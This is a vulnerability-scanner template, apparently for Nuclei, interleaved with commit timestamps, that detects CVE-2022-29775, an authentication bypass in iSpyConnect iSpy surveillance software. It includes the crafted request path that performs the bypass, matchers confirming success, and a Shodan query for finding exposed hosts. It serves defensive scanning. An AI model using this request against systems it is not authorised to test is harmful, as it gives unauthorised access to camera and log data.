2022-09-14 18:31:24 +00:00
|
|
|
id: CVE-2022-29775
|
|
|
|
|
|
|
|
info:
|
2022-09-15 01:42:13 +00:00
|
|
|
name: iSpyConnect iSpy v7.2.2.0 - Improper Authentication
|
2022-09-14 18:31:24 +00:00
|
|
|
author: arafatansari
|
2022-09-15 10:34:21 +00:00
|
|
|
severity: critical
|
2022-09-14 18:31:24 +00:00
|
|
|
description: |
|
|
|
|
iSpyConnect iSpy v7.2.2.0 allows attackers to bypass authentication via a crafted URL.
|
|
|
|
reference:
|
2022-09-15 01:42:13 +00:00
|
|
|
- https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b
|
2022-09-14 18:31:24 +00:00
|
|
|
- https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf
|
2022-09-15 01:42:13 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29775
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775
|
2022-09-15 12:24:00 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
|
|
cvss-score: 9.8
|
|
|
|
cve-id: CVE-2022-29775
|
|
|
|
cwe-id: CWE-287
|
2022-09-14 18:31:24 +00:00
|
|
|
metadata:
|
2022-09-15 01:42:13 +00:00
|
|
|
shodan-query: http.html:"iSpy is running"
|
2022-09-15 12:24:00 +00:00
|
|
|
verified: "true"
|
2022-09-15 10:34:21 +00:00
|
|
|
tags: cve,cve2022,ispy,auth-bypass
|
2022-09-14 18:31:24 +00:00
|
|
|
|
|
|
|
requests:
|
2022-09-15 01:42:13 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/logfile?d=crossdomain.xml'
|
2022-09-14 18:31:24 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-09-15 01:42:13 +00:00
|
|
|
part: body
|
2022-09-14 18:31:24 +00:00
|
|
|
words:
|
2022-09-15 10:34:21 +00:00
|
|
|
- 'Log Start'
|
2022-09-14 18:38:44 +00:00
|
|
|
- 'Log File'
|
2022-09-15 10:34:21 +00:00
|
|
|
- 'iSpy'
|
2022-09-15 01:42:13 +00:00
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|